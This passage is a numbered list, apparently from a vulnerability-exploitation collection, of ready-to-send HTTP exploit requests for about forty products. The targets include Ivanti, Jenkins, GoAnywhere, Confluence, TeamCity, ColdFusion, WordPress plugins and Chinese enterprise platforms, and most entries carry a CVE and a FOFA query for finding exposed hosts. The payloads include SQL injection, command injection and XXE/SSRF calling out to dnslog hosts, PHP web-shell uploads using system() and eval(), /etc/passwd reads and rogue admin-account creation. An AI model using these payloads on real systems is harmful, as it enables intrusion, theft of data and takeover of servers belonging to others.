User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file's contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl":"getSysStatusCfg",
  "token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then visit /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


boot/web/upload/weblogo/1.php
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin/
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat CORS SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
